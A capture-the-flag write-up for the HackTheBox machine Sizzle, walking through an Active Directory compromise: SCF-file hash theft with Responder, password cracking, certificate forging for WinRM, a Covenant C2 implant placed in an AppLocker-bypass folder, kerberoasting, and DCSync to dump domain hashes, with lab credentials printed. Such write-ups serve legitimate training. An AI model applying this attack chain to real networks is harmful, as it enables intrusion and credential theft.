# HackTheBox - Sizzle - 10.10.10.103

Sizzle is an insane rated Active Directory machine on hackthebox.eu.

## Summary

Sizzle is an Insane difficulty Windows Active Directory box. A writable directory in an SMB share allows us to steal NTLM hashes which can be cracked to access the Certificate Services Portal. A self signed certificate can be created using the CA and used for WinRM. A SPN associated with a user allows a kerberoast attack on the box. The user is found to have Replication rights which can be abused to get Administrator hashes via DCSync.

## Recon and Scanning

### Nmap Results

Based on the open ports I can deduce that this is a windows domain controller.

### FTP - Anonymous Logon

From the nmap results, it identified that anonymous FTP logins are allowed.

Nothing good on FTP.

### SMB Enumeration

Two writeable folders are identified:

It appears we need credentials before we can access the certificate authority service.

## Stealing a Users Hash

To steal user hashes we could create a malicious scf file so that when a user opens it we get their hash, which will be captured with responder.

### Cracking the Hash

Firstly, copy the users hash to a file and run john to crack it using rockyou.txt

We get the credentials, amanda:Ashare1972

### Generating a Certificate

Now let’s login to the /certsrv, AD Certificate Authority, and generate a certificate

Now let’s login and request a certificate:

Now we can use this certificate to login over winrm

## Covenant C2 Framework

To get a better overview of the AD Environment we will use Covenant, you can install it following the guide here

Next, generate a listner and then a binary grunt, finally, host it on your HTTP Listner and download it to an AppLocker Bypass Directory such as C:\Windows\System32\spool\drivers\color and execute it, you shoudl then recieve a grunt back.

### Kerberoast

This means that we can kerberoast to get the hash for the user mrlky. Firstly, we need to get a Logon Token using the following command

Now we have the hash we can attempt to crack it with john, john mrlky-tgt -w=/usr/share/wordlists/rockyou.txt

Bingo, we now have the following credentials, mrlky:Football#7

We can now repeat the process of certificate generation, winrm login and loading a grunt with covenant.

## Priv Esc from Mrlky

Now that we have a grunt loaded as mrlky, we can continue to enumerate the domain

### PowerView Enumeration

Firstly, we will load up PowerView and find all principals with Replication Rights

We can see that mrlky has the right to Replication Get Changes All so we can perform a DCSync attack using Covenant to get the Admin hash.

### DCSync

Considering that we can DCSync, we can use the DCSync command from covenant to get the administartors hash

Now we can use wmiexec with the LM and NTLM hashes to get a shell as the admin user

## After Root

Now that we have rooted the box I will use covenant to get a grunt as SYSTEM and then dump all of the domain hashes, and clean up the files left over, as I would have done on a real engagement.

Firstly let’s execute the pwn.exe to give us a grunt as SYSTEM

Now head over to the Interact Tab and run

Now that we have all of the doamin hashes the box is fully complete and we can reset it or remove all files we placed on the box to ensure that the box is clean for anyone else who want’s to pwn the box has a fair shot at it.

## User and Root Flags

We can also now get the root and user flags.

## Respect

If you enjoyed my write up or found it useful consider +repping my htb profile linked below:

Categories:

Updated: